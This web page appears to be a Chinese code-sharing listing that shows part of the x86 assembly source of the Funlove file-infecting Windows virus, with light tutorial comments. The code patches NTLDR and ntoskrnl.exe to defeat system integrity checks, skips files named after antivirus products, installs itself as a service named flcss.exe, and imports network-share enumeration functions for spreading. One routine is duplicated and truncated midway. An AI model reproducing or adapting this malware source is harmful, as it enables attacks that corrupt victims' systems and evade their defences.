📄 7.htm
字号:
and eax,0FFF00000 </p>
<p> cmp eax,0BFF00000 <br>
jnz short OS_WinNT? </p>
<p>OS_Win9x: </p>
<p> mov edi,0BFF70000 <br>
jmp short WG_00 </p>
<p>OS_WinNT?: </p>
<p> inc byte ptr [offset OS + ebx] <br>
add esi,08 <br>
cmp eax,077F00000 <br>
jnz short OS_Win2K? </p>
<p> mov edi,eax <br>
jmp short WG_00 </p>
<p>OS_Win2K?: </p>
<p> inc byte ptr [offset OS + ebx] <br>
add esi,08 <br>
cmp eax,077E00000 <br>
jnz short WG_Failed </p>
<p> mov edi,077E80000 </p>
<p>WG_00: </p>
<p> mov edx,edi <br>
mov ecx,20000 </p>
<p>WG_01: <br>
push ecx <br>
mov ecx,08 <br>
push esi <br>
push edi <br>
repz cmpsb <br>
pop edi <br>
pop esi <br>
pop ecx <br>
jz short WG_02 <br>
inc edi <br>
loop WG_01 </p>
<p>WG_Failed: </p>
<p> xor eax,eax <br>
jmp short WG_03 </p>
<p>WG_02: <br>
add edi,03 <br>
mov [offset GetProcAddress + 1 + ebx],edi </p>
<p> mov eax,edx <br>
mov [offset Kernel32_Base + ebx],eax </p>
<p>WG_03: <br>
ret <br>
;***************************************************************************<br>
;DLL 重定位子程序 <br>
;**************************************************************************<br>
DLL_Relocate: <br>
mov esi,DLL_Func </p>
<p>DR_00: <br>
mov eax,esi <br>
add eax,07 <br>
push eax <br>
push DLL_Base <br>
call GetProcAddress </p>
<p> or eax,eax <br>
jz short DR_03 </p>
<p>DR_01: <br>
mov [esi + 1],eax <br>
add esi,07 </p>
<p>DR_02: <br>
lodsb <br>
or al,al <br>
jnz short DR_02 </p>
<p> cmp byte ptr [esi],0B8 <br>
jz short DR_00 </p>
<p>DR_03: <br>
ret <br>
;**************************************************************************<br>
; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧 <br>
;**************************************************************************<br>
BlownAway: <br>
lea esi,[offset NTLDR + ebx] <br>
mov edi,DirEnd <br>
movsd <br>
movsd </p>
<p> lea edi,[offset Buffer1 + ebx] <br>
lea esi,[offset NT4_NTLDR + ebx] </p>
<p> cmp byte ptr [offset OS + ebx],01 <br>
jz short BA_00 <br>
add esi,10 </p>
<p>BA_00: </p>
<p> push edi <br>
push esi <br>
push 05 <br>
call PatchFile </p>
<p> lea esi,[offset NTOSKRNL + ebx] <br>
mov edi,DirEnd </p>
<p>BA_01: </p>
<p> movsb <br>
cmp byte ptr [esi - 1],00 <br>
jnz short BA_01 </p>
<p> lea edi,[offset Buffer1 + ebx] <br>
lea esi,[offset NT4_NTOSKRNL + ebx] </p>
<p> cmp byte ptr [offset OS + ebx],01 <br>
jz short BA_02 <br>
add esi,18 </p>
<p>BA_02: </p>
<p> push edi <br>
push esi <br>
push 09 <br>
call PatchFile <br>
ret </p>
<p>PatchFile: <br>
push p_Filename <br>
push 03 ; 打开文件 <br>
call OpenFile </p>
<p> cmp eax,-1 <br>
jz short PA_Exit </p>
<p> mov p_FileHandle,eax </p>
<p> push 00 <br>
push eax <br>
call GetFileSize ;取文件大小 </p>
<p> mov p_FileSize,eax </p>
<p> push p_FileHandle <br>
push eax <br>
call MapFile </p>
<p> or eax,eax <br>
jz short PA_CloseFile </p>
<p> mov p_MapHandle,eax </p>
<p> push eax <br>
call ViewMap </p>
<p> or eax,eax <br>
jz short PA_CloseMap </p>
<p> mov edx,eax </p>
<p> mov edi,eax <br>
mov esi,p_PatchAddr <br>
mov ecx,p_FileSize </p>
<p>PA_00: </p>
<p> push ecx <br>
push esi <br>
push edi <br>
mov ecx,p_PatchSize <br>
repz cmpsb <br>
pop edi <br>
pop esi <br>
pop ecx <br>
jz short PA_01 <br>
inc edi <br>
loop PA_00 </p>
<p> jmp short PA_Unmap </p>
<p>PA_01: </p>
<p> mov ecx,p_PatchSize <br>
add esi,ecx <br>
repz movsb </p>
<p>PA_Unmap: </p>
<p> push edx <br>
call UnmapViewOfFile </p>
<p>PA_CloseMap: </p>
<p> push p_MapHandle <br>
call CloseHandle </p>
<p>PA_CloseFile: </p>
<p> push p_FileHandle <br>
call CloseHandle ;关闭文件 </p>
<p>PA_Exit: <br>
ret <br>
;************************************************************************<br>
;此子程序用于取病毒在内存中的开始地址,经典技术 <br>
;************************************************************************<br>
GetDelta: <br>
call delta <br>
delta: <br>
pop ebx <br>
sub ebx,offset delta - VStart <br>
ret <br>
;*************************************************************************<br>
;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法 <br>
;************************************************************************<br>
RelocKernel32: <br>
push r_Kernel32 <br>
call Whereis_GPA </p>
<p> or eax,eax <br>
jz short RK_00 </p>
<p> push eax <br>
lea esi,[offset Kernel32_Functions + ebx] <br>
push esi <br>
call DLL_Relocate <br>
RK_00: <br>
ret <br>
;***********************************************************************<br>
; 以下是重定位Advapi32的子程序 <br>
;***********************************************************************<br>
RelocAdvapi32: <br>
lea eax,[offset ADVAPI32_Name + ebx] <br>
push eax <br>
call LoadLibraryA <br>
or eax,eax <br>
jz short RA_00 </p>
<p> push eax <br>
lea esi,[offset ADVAPI32_Functions + ebx] <br>
push esi <br>
call DLL_Relocate </p>
<p>RA_00: <br>
ret <br>
;********************************************************************<br>
; 打开文件子程序 <br>
;*********************************************************************<br>
OpenFile: <br>
push 20 <br>
push o_Filename <br>
call SetFileAttributesA </p>
<p> push 00 <br>
push 80 ; 普通属性 <br>
push o_OpenMode <br>
push 00 <br>
push 00 ; 不共享, <br>
push 0C0000000 ; 读写方式 <br>
push o_Filename <br>
call CreateFileA <br>
ret <br>
;*********************************************************************<br>
; 建立文件影象,找点资料看看吧 <br>
;*********************************************************************<br>
MapFile: <br>
push 00 <br>
push m_FileSize <br>
push 00 <br>
push 04 <br>
push 00 <br>
push m_FileHandle <br>
call CreateFileM <br>
;*********************************************************************<br>
; 建立文件影象,找点资料看看吧 <br>
;*********************************************************************<br>
MapFile: <br>
push 00 <br>
push m_FileSize <br>
push 00 <br>
push 04 <br>
push 00 <br>
push m_FileHandle <br>
call CreateFileMappingA <br>
ret <br>
ViewMap: <br>
push 00 <br>
push 00 <br>
push 00 <br>
push 02 <br>
push v_MapHandle <br>
call MapViewOfFile <br>
ret ;*******************************************************************<br>
; 延时,没什么说的了 <br>
;***********************************************************************<br>
Wait_A_Little: <br>
call GetTickCount <br>
sub eax,[offset Tick + ebx] <br>
cmp eax,4000 <br>
jc short WAL_00 </p>
<p> push 16000 <br>
call Sleep </p>
<p> call GetTickCount <br>
mov [offset Tick + ebx],eax <br>
WAL_00: <br>
ret <br>
GetRand: <br>
push ecx <br>
push edx <br>
mov eax,[offset Rand + ebx] <br>
xor edx,edx <br>
mov ecx,7FFFFFFF <br>
mul ecx <br>
inc eax <br>
mov ecx,0FFFFFFFBh <br>
div ecx <br>
mov eax,edx <br>
mov [offset Rand + ebx],eax <br>
pop edx <br>
pop ecx <br>
ret <br>
;*********************************************************************<br>
;以下是一些数据 <br>
;*********************************************************************<br>
HostCode db 8 dup (?) </p>
<p>GPA_Sigs: </p>
<p>W9x db 0C2,04,00,57,6A,22,2Bh,0D2 <br>
NT4 db 0C2,04,00,55,8Bh,4C,24,0C <br>
W2K db 00F,00,00,55,8Bh,0ECh,51,51 </p>
<p>NTLDR db 'NTLDR',0 </p>
<p>NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志 <br>
db 3Bh,46,58,0EBh,07 <br>
W2K_NTLDR db 3Bh,47,58,74,07 <br>
db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 </p>
<p>NTOSKRNL db 'WINNT\System32\ntoskrnl.exe',0 </p>
<p>NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志 <br>
db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 <br>
W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上 <br>
db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 <br>
;***********************************************************************<br>
;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字, <br>
;***********************************************************************<br>
SkipNames: </p>
<p> dd 139D7300h ; aler <br>
dd 0F977200h ; amon <br>
dd 118E7E1Eh ; _avp <br>
dd 52886900h ; avp3 <br>
dd 0C886900h ; avpm <br>
dd 13883207h ; f-pr <br>
dd 168E7E0Fh ; navw <br>
dd 0F997C12h ; scan <br>
dd 128B7212h ; smss <br>
dd 04907B05h ; ddhe <br>
dd 00946F05h ; dpla <br>
dd 00946F0Ch ; mpla </p>
<p><br>
Process db 'flcss.exe',0 <br>
Service db 'FLC',0 </p>
<p>; Import节表 </p>
<p>VImports: <br>
dd offset Kernel32_Pointers <br>
dd -1,-1 <br>
dd offset Kernel32_Name <br>
dd offset Kernel32_Relocated <br>
db 14 dup (0) </p>
<p>Kernel32_Pointers dd offset Kernel32_Beep <br>
Kernel32_Relocated dd offset Kernel32_Beep <br>
Kernel32_Beep db ?,?,'Beep',0 </p>
<p>;*************************************************************************<br>
; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,<br>
你就是绝顶高手了, <br>
; <br>
; 注: 绝顶高手--------没有头发的高手 <br>
;*************************************************************************<br>
Kernel32_Name db 'KERNEL32.dll',0 <br>
Kernel32_Functions: </p>
<p>CloseHandle: db 0B8,4 dup(?),0FF,0E0,'CloseHandle',0 <br>
CreateFileA: db 0B8,4 dup(?),0FF,0E0,'CreateFileA',0 <br>
CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0 <br>
CreateProcessA: db 0B8,4 dup(?),0FF,0E0,'CreateProcessA',0 <br>
CreateThread: db 0B8,4 dup(?),0FF,0E0,'CreateThread',0 <br>
FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0 <br>
FindNextFileA: db 0B8,4 dup(?),0FF,0E0,'FindNextFileA',0 <br>
FindClose: db 0B8,4 dup(?),0FF,0E0,'FindClose',0 <br>
GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0 <br>
GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0 <br>
GetFileSize: db 0B8,4 dup(?),0FF,0E0,'GetFileSize',0 <br>
GetProcAddress: db 0B8,4 dup(?),0FF,0E0,'GetProcAddress',0 <br>
GetTickCount: db 0B8,4 dup(?),0FF,0E0,'GetTickCount',0 <br>
GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0 <br>
LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0 <br>
MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0 <br>
ReadFile: db 0B8,4 dup(?),0FF,0E0,'ReadFile',0 <br>
SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0 <br>
SetFileTime: db 0B8,4 dup(?),0FF,0E0,'SetFileTime',0 <br>
Sleep: db 0B8,4 dup(?),0FF,0E0,'Sleep',0 <br>
UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0 <br>
VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0 <br>
VirtualFree: db 0B8,4 dup(?),0FF,0E0,'VirtualFree',0 <br>
WriteFile: db 0B8,4 dup(?),0FF,0E0,'WriteFile',0 </p>
<p>;注:下面的API在WIN9X中是没有的 </p>
<p> db 0 <br>
RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0
</p>
<p>USER32_Name db 'USER32.dll',0 <br>
RegisterClassA: db 0B8,4 dup(?),0FF,0E0,'RegisterClassA',0 </p>
<p>ADVAPI32_Name db 'ADVAPI32.dll',0 <br>
ADVAPI32_Functions: </p>
<p>OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0 <br>
OpenServiceA: db 0B8,4 dup(?),0FF,0E0,'OpenServiceA',0 <br>
CreateServiceA: db 0B8,4 dup(?),0FF,0E0,'CreateServiceA',0 <br>
StartServiceA: db 0B8,4 dup(?),0FF,0E0,'StartServiceA',0 <br>
StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0
<br>
RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0
<br>
SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0 </p>
<p>MPR_Name db 'MPR.dll',0 </p>
<p>MPR_Functions: </p>
<p>WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0 <br>
WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0 <br>
WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0 </p>
<p>;病毒应该是在这里就结束了 <br>
vend: </p>
<p>Kernel32_Base dd ? <br>
Rand dd ? <br>
Tick dd ? <br>
OS db ? </p>
<p>ALIGN 100 </p>
<p>Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录 <br>
Buffer2 db 200 dup (?) <br>
Buffer3 db 2000 dup (?) ;此处用于存放读入的文件 </p>
<p>CODE ENDS </p>
<p>END main <br>
</p>
<CODE><FONT color=#000000><FONT
color=#cc0000><BR>
</FONT></FONT></CODE></TD>
</TR>
</TBODY>
</TABLE>
<TABLE cellSpacing=0 width=545 align=center border=0>
<TBODY>
<TR>
<TD></TD>
</TR>
</TBODY>
</TABLE>
<P align=center> </P></BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -